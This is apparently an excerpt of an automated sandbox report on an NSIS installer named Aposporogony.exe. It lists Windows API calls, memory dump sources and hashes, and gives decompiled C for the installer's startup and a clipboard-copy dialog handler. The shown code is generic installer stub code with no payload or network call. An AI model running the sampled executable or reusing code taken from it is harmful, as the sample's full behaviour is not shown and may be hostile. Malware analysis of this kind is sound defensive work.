                                                                                                                                                                                      0x004034fb
                                                                                                                                                                                      0x00403507
                                                                                                                                                                                      0x0040350e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403510
                                                                                                                                                                                      0x00403512
                                                                                                                                                                                      0x00403520
                                                                                                                                                                                      0x00403525
                                                                                                                                                                                      0x0040352c
                                                                                                                                                                                      0x00403530
                                                                                                                                                                                      0x00403534
                                                                                                                                                                                      0x00403536
                                                                                                                                                                                      0x00403536
                                                                                                                                                                                      0x00403534
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040352c

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                                                                                                      • GetVersion.KERNEL32 ref: 004034CE
                                                                                                                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                                                                                                      • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Aposporogony.exe",00000020,"C:\Users\user\Desktop\Aposporogony.exe",00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                                                                                        • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                        • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403705
                                                                                                                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403721
                                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                                                                                                      • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040384D
                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 0040385C
                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403867
                                                                                                                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Aposporogony.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                                                                                                      • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\Aposporogony.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\Aposporogony.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Ogtiern\Hamiltonianism$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Ogtiern\Hamiltonianism\Scups$C:\Users\user\Desktop$C:\Users\user\Desktop\Aposporogony.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                      • API String ID: 3441113951-2617004110
                                                                                                                                                                                      • Opcode ID: a46985901f0cb2d6ed5b6c69e9a114a4d7b87bc945d132a26b89da096030774c
                                                                                                                                                                                      • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                                                                                                      • Opcode Fuzzy Hash: a46985901f0cb2d6ed5b6c69e9a114a4d7b87bc945d132a26b89da096030774c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 139 40558f-4055aa 140 4055b0-405677 GetDlgItem * 3 call 404394 call 404ced GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 405739-405740 139->141 162 405695-405698 140->162 163 405679-405693 SendMessageW * 2 140->163 143 405742-405764 GetDlgItem CreateThread CloseHandle 141->143 144 40576a-405777 141->144 143->144 146 405795-40579f 144->146 147 405779-40577f 144->147 151 4057a1-4057a7 146->151 152 4057f5-4057f9 146->152 149 405781-405790 ShowWindow * 2 call 404394 147->149 150 4057ba-4057c3 call 4043c6 147->150 149->146 159 4057c8-4057cc 150->159 157 4057a9-4057b5 call 404338 151->157 158 4057cf-4057df ShowWindow 151->158 152->150 155 4057fb-405801 152->155 155->150 164 405803-405816 SendMessageW 155->164 157->150 160 4057e1-4057ea call 405450 158->160 161 4057ef-4057f0 call 404338 158->161 160->161 161->152 168 4056a8-4056bf call 40435f 162->168 169 40569a-4056a6 SendMessageW 162->169 163->162 170 405918-40591a 164->170 171 40581c-405847 CreatePopupMenu call 40640a AppendMenuW 164->171 178 4056c1-4056d5 ShowWindow 168->178 179 4056f5-405716 GetDlgItem SendMessageW 168->179 169->168 170->159 176 405849-405859 GetWindowRect 171->176 177 40585c-405871 TrackPopupMenu 171->177 176->177 177->170 181 405877-40588e 177->181 182 4056e4 178->182 183 4056d7-4056e2 ShowWindow 178->183 179->170 180 40571c-405734 SendMessageW * 2 179->180 180->170 184 405893-4058ae SendMessageW 181->184 185 4056ea-4056f0 call 404394 182->185 183->185 184->184 186 4058b0-4058d3 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 4058d5-4058fc SendMessageW 186->188 188->188 189 4058fe-405912 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                      			E0040558F(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                                                                                                                      				struct HWND__* _v8;
                                                                                                                                                                                      				long _v12;
                                                                                                                                                                                      				struct tagRECT _v28;
                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                      				int _v44;
                                                                                                                                                                                      				int _v48;
                                                                                                                                                                                      				signed int _v52;
                                                                                                                                                                                      				int _v56;
                                                                                                                                                                                      				void* _v60;
                                                                                                                                                                                      				void* _v68;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				struct HWND__* _t94;
                                                                                                                                                                                      				long _t95;
                                                                                                                                                                                      				int _t100;
                                                                                                                                                                                      				void* _t108;
                                                                                                                                                                                      				intOrPtr _t119;
                                                                                                                                                                                      				void* _t127;
                                                                                                                                                                                      				intOrPtr _t130;
                                                                                                                                                                                      				struct HWND__* _t134;
                                                                                                                                                                                      				int _t156;
                                                                                                                                                                                      				int _t159;
                                                                                                                                                                                      				struct HMENU__* _t164;
                                                                                                                                                                                      				struct HWND__* _t168;
                                                                                                                                                                                      				struct HWND__* _t169;
                                                                                                                                                                                      				int _t171;
                                                                                                                                                                                      				void* _t172;
                                                                                                                                                                                      				short* _t173;
                                                                                                                                                                                      				short* _t175;
                                                                                                                                                                                      				int _t177;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t169 =  *0x429224;
                                                                                                                                                                                      				_t156 = 0;
                                                                                                                                                                                      				_v8 = _t169;
                                                                                                                                                                                      				if(_a8 != 0x110) {
                                                                                                                                                                                      					if(_a8 == 0x405) {
                                                                                                                                                                                      						_t127 = CreateThread(0, 0, E00405523, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                                                                                                                                                      						CloseHandle(_t127); // executed
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(_a8 != 0x111) {
                                                                                                                                                                                      						L17:
                                                                                                                                                                                      						_t171 = 1;
                                                                                                                                                                                      						if(_a8 != 0x404) {
                                                                                                                                                                                      							L25:
                                                                                                                                                                                      							if(_a8 != 0x7b) {
                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t94 = _v8;
                                                                                                                                                                                      							if(_a12 != _t94) {
                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                                                                                                                                      							_a8 = _t95;
                                                                                                                                                                                      							if(_t95 <= _t156) {
                                                                                                                                                                                      								L36:
                                                                                                                                                                                      								return 0;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t164 = CreatePopupMenu();
                                                                                                                                                                                      							AppendMenuW(_t164, _t156, _t171, E0040640A(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                                                                                                                                      							_t100 = _a16;
                                                                                                                                                                                      							_t159 = _a16 >> 0x10;
                                                                                                                                                                                      							if(_a16 == 0xffffffff) {
                                                                                                                                                                                      								GetWindowRect(_v8,  &_v28);
                                                                                                                                                                                      								_t100 = _v28.left;
                                                                                                                                                                                      								_t159 = _v28.top;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                                                                                                                                                      								_v60 = _t156;
                                                                                                                                                                                      								_v48 = 0x423728;
                                                                                                                                                                                      								_v44 = 0x1000;
                                                                                                                                                                                      								_a4 = _a8;
                                                                                                                                                                                      								do {
                                                                                                                                                                                      									_a4 = _a4 - 1;
                                                                                                                                                                                      									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                                                                                                                                                      								} while (_a4 != _t156);
                                                                                                                                                                                      								OpenClipboard(_t156);
                                                                                                                                                                                      								EmptyClipboard();
                                                                                                                                                                                      								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                                                                                                                                      								_a4 = _t108;
                                                                                                                                                                                      								_t172 = GlobalLock(_t108);
                                                                                                                                                                                      								do {
                                                                                                                                                                                      									_v48 = _t172;
                                                                                                                                                                                      									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                                                                                                                                      									 *_t173 = 0xd;
                                                                                                                                                                                      									_t175 = _t173 + 2;
                                                                                                                                                                                      									 *_t175 = 0xa;
                                                                                                                                                                                      									_t172 = _t175 + 2;
                                                                                                                                                                                      									_t156 = _t156 + 1;
                                                                                                                                                                                      								} while (_t156 < _a8);
                                                                                                                                                                                      								GlobalUnlock(_a4);
                                                                                                                                                                                      								SetClipboardData(0xd, _a4);
                                                                                                                                                                                      								CloseClipboard();
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if( *0x42920c == _t156) {
                                                                                                                                                                                      							ShowWindow( *0x42a248, 8);
                                                                                                                                                                                      							if( *0x42a2ec == _t156) {
                                                                                                                                                                                      								_t119 =  *0x422700; // 0x6fcc74
                                                                                                                                                                                      								E00405450( *((intOrPtr*)(_t119 + 0x34)), _t156);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							E00404338(_t171);
                                                                                                                                                                                      							goto L25;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						 *0x421ef8 = 2;
                                                                                                                                                                                      						E00404338(0x78);
                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						if(_a12 != 0x403) {
                                                                                                                                                                                      							L20:
                                                                                                                                                                                      							return E004043C6(_a8, _a12, _a16);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						ShowWindow( *0x429210, _t156);
                                                                                                                                                                                      						ShowWindow(_t169, 8);
                                                                                                                                                                                      						E00404394(_t169);
                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_v52 = _v52 | 0xffffffff;
                                                                                                                                                                                      				_v40 = _v40 | 0xffffffff;
                                                                                                                                                                                      				_t177 = 2;
                                                                                                                                                                                      				_v60 = _t177;
                                                                                                                                                                                      				_v56 = 0;
                                                                                                                                                                                      				_v48 = 0;
                                                                                                                                                                                      				_v44 = 0;
                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                      				_t130 =  *0x42a254;
                                                                                                                                                                                      				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                                                                                                                                      				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                                                                                                                                      				 *0x429210 = GetDlgItem(_a4, 0x403);
                                                                                                                                                                                      				 *0x429208 = GetDlgItem(_a4, 0x3ee);
                                                                                                                                                                                      				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                                                                                                                                      				 *0x429224 = _t134;
                                                                                                                                                                                      				_v8 = _t134;
                                                                                                                                                                                      				E00404394( *0x429210);
                                                                                                                                                                                      				 *0x429214 = E00404CED(4);
                                                                                                                                                                                      				 *0x42922c = 0;
                                                                                                                                                                                      				GetClientRect(_v8,  &_v28);
                                                                                                                                                                                      				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                                                                                                                                      				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                                                                                                                                                      				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                                                                                                                                                      				if(_a8 >= 0) {
                                                                                                                                                                                      					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                                                                                                                                      					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if(_a12 >= _t156) {
                                                                                                                                                                                      					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                                                                                      				_push(0x1b);
                                                                                                                                                                                      				E0040435F(_a4);
                                                                                                                                                                                      				if(( *0x42a25c & 0x00000003) != 0) {
                                                                                                                                                                                      					ShowWindow( *0x429210, _t156);
                                                                                                                                                                                      					if(( *0x42a25c & 0x00000002) != 0) {
                                                                                                                                                                                      						 *0x429210 = _t156;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						ShowWindow(_v8, 8);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					E00404394( *0x429208);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                                                                                                                                      				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                                                                                                                                      				if(( *0x42a25c & 0x00000004) != 0) {
                                                                                                                                                                                      					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                                                                                                                                      					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				goto L36;
                                                                                                                                                                                      			}



































                                                                                                                                                                                      0x00405597
                                                                                                                                                                                      0x0040559d
                                                                                                                                                                                      0x004055a7
                                                                                                                                                                                      0x004055aa
                                                                                                                                                                                      0x00405740
                                                                                                                                                                                      0x0040575d
                                                                                                                                                                                      0x00405764
                                                                                                                                                                                      0x00405764
                                                                                                                                                                                      0x00405777
                                                                                                                                                                                      0x00405795
                                                                                                                                                                                      0x00405797
                                                                                                                                                                                      0x0040579f
                                                                                                                                                                                      0x004057f5
                                                                                                                                                                                      0x004057f9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004057fb
                                                                                                                                                                                      0x00405801
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040580b
                                                                                                                                                                                      0x00405813
                                                                                                                                                                                      0x00405816
                                                                                                                                                                                      0x00405918
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405918
                                                                                                                                                                                      0x00405825
                                                                                                                                                                                      0x00405830
                                                                                                                                                                                      0x00405839
                                                                                                                                                                                      0x00405844
                                                                                                                                                                                      0x00405847
                                                                                                                                                                                      0x00405850
                                                                                                                                                                                      0x00405856
                                                                                                                                                                                      0x00405859
                                                                                                                                                                                      0x00405859
                                                                                                                                                                                      0x00405871
                                                                                                                                                                                      0x0040587a
                                                                                                                                                                                      0x0040587d
                                                                                                                                                                                      0x00405884
                                                                                                                                                                                      0x0040588b
                                                                                                                                                                                      0x00405893
                                                                                                                                                                                      0x00405893
                                                                                                                                                                                      0x004058aa
                                                                                                                                                                                      0x004058aa
                                                                                                                                                                                      0x004058b1
                                                                                                                                                                                      0x004058b7
                                                                                                                                                                                      0x004058c3
                                                                                                                                                                                      0x004058ca
                                                                                                                                                                                      0x004058d3
                                                                                                                                                                                      0x004058d5
                                                                                                                                                                                      0x004058d8
                                                                                                                                                                                      0x004058e7
                                                                                                                                                                                      0x004058ea
                                                                                                                                                                                      0x004058f0
                                                                                                                                                                                      0x004058f1
                                                                                                                                                                                      0x004058f7
                                                                                                                                                                                      0x004058f8
                                                                                                                                                                                      0x004058f9
                                                                                                                                                                                      0x00405901
                                                                                                                                                                                      0x0040590c
                                                                                                                                                                                      0x00405912
                                                                                                                                                                                      0x00405912
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405871
                                                                                                                                                                                      0x004057a7
                                                                                                                                                                                      0x004057d7
                                                                                                                                                                                      0x004057df
                                                                                                                                                                                      0x004057e1
                                                                                                                                                                                      0x004057ea
                                                                                                                                                                                      0x004057ea
                                                                                                                                                                                      0x004057f0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004057f0
                                                                                                                                                                                      0x004057ab
                                                                                                                                                                                      0x004057b5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405779
                                                                                                                                                                                      0x0040577f
                                                                                                                                                                                      0x004057ba
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004057c3
                                                                                                                                                                                      0x00405788
                                                                                                                                                                                      0x0040578d
                                                                                                                                                                                      0x00405790
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405790
                                                                                                                                                                                      0x00405777
                                                                                                                                                                                      0x004055b0
                                                                                                                                                                                      0x004055b4
                                                                                                                                                                                      0x004055bc
                                                                                                                                                                                      0x004055c0
                                                                                                                                                                                      0x004055c3
                                                                                                                                                                                      0x004055c6
                                                                                                                                                                                      0x004055c9
                                                                                                                                                                                      0x004055cc
                                                                                                                                                                                      0x004055cd
                                                                                                                                                                                      0x004055ce
                                                                                                                                                                                      0x004055e7
                                                                                                                                                                                      0x004055ea
                                                                                                                                                                                      0x004055f4
                                                                                                                                                                                      0x00405603
                                                                                                                                                                                      0x0040560b
                                                                                                                                                                                      0x00405613
                                                                                                                                                                                      0x00405618
                                                                                                                                                                                      0x0040561b
                                                                                                                                                                                      0x00405627
                                                                                                                                                                                      0x00405630
                                                                                                                                                                                      0x00405639
                                                                                                                                                                                      0x0040565b
                                                                                                                                                                                      0x00405661
                                                                                                                                                                                      0x00405672
                                                                                                                                                                                      0x00405677
                                                                                                                                                                                      0x00405685
                                                                                                                                                                                      0x00405693
                                                                                                                                                                                      0x00405693
                                                                                                                                                                                      0x00405698
                                                                                                                                                                                      0x004056a6
                                                                                                                                                                                      0x004056a6
                                                                                                                                                                                      0x004056ab
                                                                                                                                                                                      0x004056ae
                                                                                                                                                                                      0x004056b3
                                                                                                                                                                                      0x004056bf
                                                                                                                                                                                      0x004056c8
                                                                                                                                                                                      0x004056d5
                                                                                                                                                                                      0x004056e4
                                                                                                                                                                                      0x004056d7
                                                                                                                                                                                      0x004056dc
                                                                                                                                                                                      0x004056dc
                                                                                                                                                                                      0x004056f0
                                                                                                                                                                                      0x004056f0
                                                                                                                                                                                      0x00405704
                                                                                                                                                                                      0x0040570d
                                                                                                                                                                                      0x00405716
                                                                                                                                                                                      0x00405726
                                                                                                                                                                                      0x00405732
                                                                                                                                                                                      0x00405732
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                                                                                                        • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00405764
                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 004058B7
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00405912
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
